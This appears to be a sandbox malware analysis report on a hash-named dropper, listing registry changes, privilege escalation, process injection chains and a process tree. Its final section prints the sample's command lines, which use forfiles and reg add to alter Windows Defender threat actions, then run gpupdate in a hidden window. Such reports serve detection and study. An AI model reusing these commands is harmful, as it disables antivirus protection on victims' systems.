Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2648 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe
PID 2648 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe
PID 2648 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe
PID 2648 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe
PID 2648 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe
PID 2648 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe
PID 2648 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe
PID 2884 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe
PID 2884 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe
PID 2884 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe
PID 2884 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe
PID 2884 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe
PID 2884 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe
PID 2884 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe
PID 2544 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2544 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2544 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2544 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2544 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2544 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2544 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2576 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2576 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2576 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2576 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2576 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2576 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2704 wrote to memory of 2368 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2368 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2368 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2368 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2368 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2368 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2368 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2368 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2368 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2368 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2368 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2368 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2368 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2368 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2576 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2576 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2576 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2576 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2576 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2576 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2576 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2604 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2604 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2604 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2604 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2604 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2604 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2604 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2608 wrote to memory of 2524 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 2524 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 2524 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 2524 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 2524 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 2524 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 2524 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2576 wrote to memory of 3060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe

"C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe"

C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe

.\Install.exe /KZqjdidXaW "385121" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

